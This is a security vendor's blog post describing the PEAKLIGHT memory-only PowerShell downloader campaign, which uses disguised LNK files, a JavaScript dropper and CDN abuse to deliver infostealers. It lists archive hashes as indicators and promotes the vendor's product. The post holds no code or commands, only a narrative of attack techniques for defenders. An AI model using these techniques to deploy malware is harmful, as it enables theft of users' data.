Mandiant cybersecurity researchers recently released a blog on a memory-only dropper which uses a complex multi-stage infection process. This PowerShell-based downloader is being tracked as PEAKLIGHT. Mandiant researcher findings note that this memory only dropper and downloader was being used to deliver malware-as-a-service infostealers.
Morphisec researchers reviewed the article and tested the indicators of compromise (IOCs) to understand the impact of the malware on Morphisec’s customers. As expected, the attack was prevented by Morphisec. This validates the strength of Morphisec in protecting organizations against the impact of sophisticated, complex in-memory based attacks like PEAKLIGHT.
Morphisec’s Automated Moving Target Defense (AMTD) technology and its prevention mechanisms provide early visibility of attack techniques used by adversaries, thus facilitating quicker containment of cyber-incidents, improving cyber-resiliency and an organization's ability to recover from cyber-attacks.
PEAKLIGHT infection chain and attack flow
Credit: Mandiant
The infection chain starts with a user downloading malicious ZIP files impersonating pirated movies. The archives contain a malicious LNK file which on execution initiates an outbound connection to a URL hosting the malicious payload/code.
LNK files are a common tactic used by threat actors to trick unsuspecting users into executing malware by deceit. These files can be disguised as legitimate documents or programs, making them effective for hiding in plain sight.
Different documented variations of the attack employ living land techniques to stay stealthy and employ CDN abuse.
The Content Delivery Network Abuse abuses the trust of legitimate CDN networks to deploy malicious software. Employing CDN abuse techniques helps adversaries bypass the security of web filtering solutions as the CDN networks generally have good reputation.
In the second stage of the attack, a Javascript Dropper is delivered, which on execution runs an embedded payload with variations to deliver the next stage of the PEAKLIGHT PowerShell downloader attack chain. Next, a JavaScript Dropper downloads and executes an embedded payload which on execution delivers the PEAKLIGHT downloader onto the system.
PEAKLIGHT downloader is designed to deliver and execute the final payload (Stage 4), which delivers infostealers onto a compromised system. The payloads are in zip format and are downloaded from reputable CDN networks.
The final payload in the attack chain is the archive files, which on execution will install the designated infostealers on the system.
Analysis of the archive files were done by Morphisec, analysis details below.
Archive: K1.zip
HASH: ead01fc10a3a7c5bef4f37a8137724c290716d07f4f032d5057f2a198834d5d7
HASH: 8235bd354b95a117a50922b994732cba101815a26a502ab9dc039a533329e2a5
Archive: K1.zip
VT Analysis shows the active Archive payload K1.zip with different hashes being first seen around April and May 2024.
The results show a very low detection rate by the static engines analysis until 22 Aug 2024, at which point there were 31 detections — of note, this was observed shortly before Mandiant researchers released their PEAKLIGHT findings.
The low detections by various NGAV/EDR vendors from April to August 2024 validate that the techniques used by the adversaries were complex and sophisticated and could have been employed to breach defenses of incumbent solutions.
Morphisec’s native AMTD-based protection focuses on introducing dynamism during the loading of the applications in runtime, and as such did not need any prior knowledge of the attack to prevent it.
Our test of the archive payloads and subsequent prevention validates the strengths of AMTD-based protection as is visible in the below prevention log of the final payload archive.
We found similar prevention logs in some customer environments globally. One of these customers operates in the healthcare manufacturing sector and has offices globally — one of their locations was targeted by this group.
The campaign was observed from May 2024 and was designed to deliver sophisticated infostealers which were prevented by Morphisec at a stage where an AutoIT script was used to deliver the final payload.
This again validates the capabilities of Morphisec in preventing against unknown attacks as in May 2024, the campaign was not widely known and had relatively low detections in VT static analysis.
Conclusion
Morphisec’s AMTD-based approach supports crucial Defense-in-Depth strategy that organizations need in order to achieve a hardened endpoint security strategy. The PEAKLIGHT PowerShell downloader is an example of the complex and sophisticated attacks that adversary groups are now creating to evade detection solutions.
Morphisec’s AMTD complements existing NGAV/EDR solutions — it focuses on denying attackers the environment to run these sophisticated attacks. This prevention-focused approach does not require prior knowledge of the attack and is signatureless, reducing the IT Security team's operational overhead.
Combining AMTD with the Adaptive Exposure Management capabilities offers organizations visibility to exposed attack surfaces and by extension helps build a credible Anti-Ransomware Assurance model.
See Morphisec in action — book a demo today.